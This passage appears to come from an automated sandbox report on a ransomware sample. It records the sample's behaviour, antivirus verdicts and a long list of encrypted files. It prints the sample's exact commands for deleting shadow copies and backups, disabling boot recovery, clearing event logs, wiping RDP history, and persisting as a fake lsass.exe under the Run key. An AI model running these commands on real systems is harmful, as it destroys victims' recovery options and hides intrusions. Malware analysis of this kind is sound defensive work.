658
659
660 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
661
662
663 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
664
665
666 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
667
668
669 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
670
671
672 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
673
674
675 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
676
677
678 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
679
680
681 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
682
683
684 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
685
686
687 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
688
689
690 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
691
692
693 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
694
695
696 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
697
698
699 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
700
701
702 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
703
704
705 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
706
707
708 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
709
710
711 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
712
713
714 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
715
716
717 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
718
719
720 "command": "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1"
721
722
723 "command": "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete"
724
725
726 "command": "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete"
727
728
729 "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
730
731
732 "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
733
734
735 "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
736
737
738 "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
739
740
741 "command": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
742
743
744 "command": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
745
746
747 "command": "attrib \"C:\\Users\\user\\documents\\Default.rdp\" -s -h"
748
749
750 "command": "sc config eventlog start=disabled"
751
752
753 "command": "\"C:\\Program Files\\Common Files\\Microsoft Shared\\Office15\\OLicenseHeartbeat.exe\""
754
755
756
757
758 "Description": "Attempts to delete volume shadow copies",
759 "Details":
760
761
762 "Description": "Deletes its original binary from disk",
763 "Details":
764
765
766 "Description": "Modifies boot configuration settings",
767 "Details":
768
769 "disables_system_recovery": "Modifies the boot configuration to disable startup recovery"
770
771
772 "ignorefailures": "Modifies the boot configuration to disable Windows error recovery"
773
774
775
776
777 "Description": "A system process is generating network traffic likely as a result of process injection",
778 "Details":
779
780 "http_request": "lsass.exe_InternetConnectA_iplogger.ru"
781
782
783 "http_request_path": "lsass.exe_HttpOpenRequestA_1Oh8E.jpeg"
784
785
786
787
788 "Description": "Installs itself for autorun at Windows startup",
789 "Details":
790
791 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Local Security Authority Subsystem Service"
792
793
794 "data": "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start"
795
796
797
798
799 "Description": "Exhibits possible ransomware file modification behavior",
800 "Details":
801
802 "file_modifications": "Performs 146 file moves indicative of a potential file encryption process"
803
804
805 "drops_unknown_mimetypes": "Drops 159 unknown file mime types which may be indicative of encrypted files being written back to disk"
806
807
808
809
810 "Description": "Writes a potential ransom message to disk",
811 "Details":
812
813 "ransom_file": "!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT"
814
815
816
817
818 "Description": "Stack pivoting was detected when using a critical API",
819 "Details":
820
821 "process": "taskeng.exe:2584"
822
823
824 "process": "taskeng.exe:1604"
825
826
827
828
829 "Description": "File has been identified by 15 Antiviruses on VirusTotal as malicious",
830 "Details":
831
832 "Cylance": "Unsafe"
833
834
835 "CrowdStrike": "win/malicious_confidence_100% (D)"
836
837
838 "Symantec": "ML.Attribute.HighConfidence"
839
840
841 "APEX": "Malicious"
842
843
844 "Endgame": "malicious (high confidence)"
845
846
847 "Invincea": "heuristic"
848
849
850 "McAfee-GW-Edition": "BehavesLike.Win32.PWSQQPass.gh"
851
852
853 "FireEye": "Generic.mg.636d3c669e36510b"
854
855
856 "SentinelOne": "DFI - Malicious PE"
857
858
859 "Microsoft": "Trojan:Win32/Suloc.A"
860
861
862 "Acronis": "suspicious"
863
864
865 "VBA32": "Malware-Cryptor.General.3"
866
867
868 "Rising": "Trojan.Generic@ML.100 (RDML:kwEnH7CqjV0yUM4V3OzqNQ)"
869
870
871 "Cybereason": "malicious.5d1a74"
872
873
874 "Qihoo-360": "HEUR/QVM19.1.F7E7.Malware.Gen"
875
876
877
878
879 "Description": "Detects VirtualBox through the presence of a file",
880 "Details":
881
882 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat"
883
884
885 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf"
886
887
888 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf"
889
890
891 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat"
892
893
894 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf"
895
896
897 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat"
898
899
900
901
902 "Description": "Clears Windows events or logs",
903 "Details":
904
905 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
906
907
908 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
909
910
911 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
912
913
914 "command": "wevtutil.exe clear-log Application"
915
916
917 "command": "wevtutil.exe clear-log Security"
918
919
920 "command": "wevtutil.exe clear-log System"
921
922
923
924
925 "Description": "Appears to use character obfuscation in a command line (no obfuscated characters are actually visible in the command below; what it does show is the sample copying itself to %APPDATA%\\Microsoft\\Windows\\lsass.exe, masquerading as the Local Security Authority process, and registering that copy under the HKCU Run key for persistence)",
926 "Details":
927
928 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
929
930
931
932
933 "Description": "Creates a copy of itself",
934 "Details":
935
936 "copy": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe"
937
938
939
940
941 "Description": "Drops a binary and executes it",
942 "Details":
943
944 "binary": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe"
945
946
947
948
949 "Description": "Anomalous binary characteristics",
950 "Details":
951
952 "anomaly": "Found duplicated section names"
953
954
955
956
957 "Description": "Uses suspicious command line tools or Windows utilities: inhibits recovery (bcdedit disables the recovery environment and boot-failure handling, wbadmin deletes the backup catalog and system-state backups, vssadmin deletes all shadow copies), wipes the RDP connection history (Default.rdp), clears event logs, and removes its own dropper in a ping-delayed retry loop",
958 "Details":
959
960 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
961
962
963 "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe\" exit )"
964
965
966 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
967
968
969 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
970
971
972 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
973
974
975 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
976
977
978 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
979
980
981 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
982
983
984 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
985
986
987 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
988
989
990 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
991
992
993 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
994
995
996 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
997
998
999 "command": "vssadmin delete shadows /all /quiet"
1000
1001
1002 "command": "wevtutil.exe clear-log Application"
1003
1004
1005 "command": "wevtutil.exe clear-log Security"
1006
1007
1008 "command": "wevtutil.exe clear-log System"
1009
1010
1011
1012
1013
1014* Started Service:
1015
1016* Mutexes (these appear to be standard Windows WMI ADAP / Remote Assistance mutex names rather than sample-specific markers; verify against a clean baseline before using them as IOCs):
1017 "Global\\ADAP_WMI_ENTRY",
1018 "Global\\RefreshRA_Mutex",
1019 "Global\\RefreshRA_Mutex_Lib",
1020 "Global\\RefreshRA_Mutex_Flag"
1021
1022
1023* Modified Files (encrypted files receive the suffix .875B149F-7E2C-F9D8-914C-24C48737255D and a ransom note "!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT" is dropped in each visited directory; the .buran temp files in %TEMP% are written here and deleted later):
1024 "C:\\Users\\user\\AppData\\Local\\Temp\\344AA25B.buran",
1025 "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe",
1026 "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran",
1027 "\\??\\PIPE\\wkssvc",
1028 "\\Device\\LanmanDatagramReceiver",
1029 "\\??\\PIPE\\DAV RPC SERVICE",
1030 "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
1031 "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
1032 "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
1033 "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
1034 "\\??\\PIPE\\samr",
1035 "C:\\.doc",
1036 "C:\\.doc.875B149F-7E2C-F9D8-914C-24C48737255D",
1037 "C:\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1038 "C:\\.htm",
1039 "C:\\.htm.875B149F-7E2C-F9D8-914C-24C48737255D",
1040 "C:\\.jpeg",
1041 "C:\\.jpeg.875B149F-7E2C-F9D8-914C-24C48737255D",
1042 "C:\\.jpg",
1043 "C:\\.jpg.875B149F-7E2C-F9D8-914C-24C48737255D",
1044 "C:\\.pptx",
1045 "C:\\.pptx.875B149F-7E2C-F9D8-914C-24C48737255D",
1046 "C:\\.txt",
1047 "C:\\.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1048 "C:\\.xls",
1049 "C:\\.xls.875B149F-7E2C-F9D8-914C-24C48737255D",
1050 "C:\\.zip",
1051 "C:\\Host.bmp",
1052 "C:\\Host.bmp.875B149F-7E2C-F9D8-914C-24C48737255D",
1053 "C:\\Host.docx",
1054 "C:\\Host.docx.875B149F-7E2C-F9D8-914C-24C48737255D",
1055 "C:\\Host.html",
1056 "C:\\Host.html.875B149F-7E2C-F9D8-914C-24C48737255D",
1057 "C:\\Host.jpeg",
1058 "C:\\Host.jpeg.875B149F-7E2C-F9D8-914C-24C48737255D",
1059 "C:\\Host.jpg",
1060 "C:\\Host.jpg.875B149F-7E2C-F9D8-914C-24C48737255D",
1061 "C:\\Host.pdf",
1062 "C:\\Host.pdf.875B149F-7E2C-F9D8-914C-24C48737255D",
1063 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico",
1064 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico.875B149F-7E2C-F9D8-914C-24C48737255D",
1065 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1066 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url",
1067 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url.875B149F-7E2C-F9D8-914C-24C48737255D",
1068 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat",
1069 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat.875B149F-7E2C-F9D8-914C-24C48737255D",
1070 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf",
1071 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf.875B149F-7E2C-F9D8-914C-24C48737255D",
1072 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat",
1073 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat.875B149F-7E2C-F9D8-914C-24C48737255D",
1074 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf",
1075 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf.875B149F-7E2C-F9D8-914C-24C48737255D",
1076 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat",
1077 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat.875B149F-7E2C-F9D8-914C-24C48737255D",
1078 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf",
1079 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf.875B149F-7E2C-F9D8-914C-24C48737255D",
1080 "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT",
1081 "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT.875B149F-7E2C-F9D8-914C-24C48737255D",
1082 "C:\\Program Files\\Java\\jre1.8.0_201\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1083 "C:\\Program Files\\Java\\jre1.8.0_201\\LICENSE",
1084 "C:\\Program Files\\Java\\jre1.8.0_201\\LICENSE.875B149F-7E2C-F9D8-914C-24C48737255D",
1085 "C:\\Program Files\\Java\\jre1.8.0_201\\README.txt",
1086 "C:\\Program Files\\Java\\jre1.8.0_201\\README.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1087 "C:\\Program Files\\Java\\jre1.8.0_201\\release",
1088 "C:\\Program Files\\Java\\jre1.8.0_201\\release.875B149F-7E2C-F9D8-914C-24C48737255D",
1089 "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME-JAVAFX.txt",
1090 "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME-JAVAFX.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1091 "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME.txt",
1092 "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1093 "C:\\Program Files\\Java\\jre1.8.0_201\\Welcome.html",
1094 "C:\\Program Files\\Java\\jre1.8.0_201\\Welcome.html.875B149F-7E2C-F9D8-914C-24C48737255D",
1095 "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\classes.jsa",
1096 "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\classes.jsa.875B149F-7E2C-F9D8-914C-24C48737255D",
1097 "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1098 "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\Xusage.txt",
1099 "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\Xusage.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1100 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\accessibility.properties",
1101 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\accessibility.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1102 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1103 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\calendars.properties",
1104 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\calendars.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1105 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\charsets.jar",
1106 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\charsets.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1107 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\classlist",
1108 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\classlist.875B149F-7E2C-F9D8-914C-24C48737255D",
1109 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\content-types.properties",
1110 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\content-types.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1111 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\currency.data",
1112 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\currency.data.875B149F-7E2C-F9D8-914C-24C48737255D",
1113 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy.jar",
1114 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1115 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\flavormap.properties",
1116 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\flavormap.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1117 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.bfc",
1118 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.bfc.875B149F-7E2C-F9D8-914C-24C48737255D",
1119 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.properties.src",
1120 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.properties.src.875B149F-7E2C-F9D8-914C-24C48737255D",
1121 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\hijrah-config-umalqura.properties",
1122 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\hijrah-config-umalqura.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1123 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javafx.properties",
1124 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javafx.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1125 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javaws.jar",
1126 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javaws.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1127 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jce.jar",
1128 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jce.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1129 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr.jar",
1130 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1131 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfxswt.jar",
1132 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfxswt.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1133 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jsse.jar",
1134 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jsse.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1135 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jvm.hprof.txt",
1136 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jvm.hprof.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1137 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\logging.properties",
1138 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\logging.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1139 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management-agent.jar",
1140 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management-agent.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1141 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\meta-index",
1142 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\meta-index.875B149F-7E2C-F9D8-914C-24C48737255D",
1143 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\net.properties",
1144 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\net.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1145 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\plugin.jar",
1146 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\plugin.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1147 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfont.properties.ja",
1148 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfont.properties.ja.875B149F-7E2C-F9D8-914C-24C48737255D",
1149 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfontj2d.properties",
1150 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfontj2d.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1151 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\resources.jar",
1152 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\resources.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1153 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\rt.jar",
1154 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\rt.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1155 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\sound.properties",
1156 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\sound.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1157 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzdb.dat",
1158 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzdb.dat.875B149F-7E2C-F9D8-914C-24C48737255D",
1159 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzmappings",
1160 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzmappings.875B149F-7E2C-F9D8-914C-24C48737255D",
1161 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\amd64\\jvm.cfg",
1162 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\amd64\\jvm.cfg.875B149F-7E2C-F9D8-914C-24C48737255D",
1163 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\amd64\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1164 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\CIEXYZ.pf",
1165 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\CIEXYZ.pf.875B149F-7E2C-F9D8-914C-24C48737255D",
1166 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1167 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\GRAY.pf",
1168 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\GRAY.pf.875B149F-7E2C-F9D8-914C-24C48737255D",
1169 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\LINEAR_RGB.pf",
1170 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\LINEAR_RGB.pf.875B149F-7E2C-F9D8-914C-24C48737255D",
1171 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\PYCC.pf",
1172 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\PYCC.pf.875B149F-7E2C-F9D8-914C-24C48737255D",
1173 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\sRGB.pf",
1174 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\sRGB.pf.875B149F-7E2C-F9D8-914C-24C48737255D",
1175 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\ffjcext.zip",
1176 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\ffjcext.zip.875B149F-7E2C-F9D8-914C-24C48737255D",
1177 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1178 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages.properties",
1179 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1180 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_de.properties",
1181 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_de.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1182 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_es.properties",
1183 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_es.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1184 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_fr.properties",
1185 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_fr.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1186 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_it.properties",
1187 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_it.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1188 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ja.properties",
1189 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ja.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1190 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ko.properties",
1191 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ko.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1192 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_pt_BR.properties",
1193 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_pt_BR.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1194 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_sv.properties",
1195 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_sv.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1196 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_CN.properties",
1197 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_CN.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1198 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_HK.properties",
1199 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_HK.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
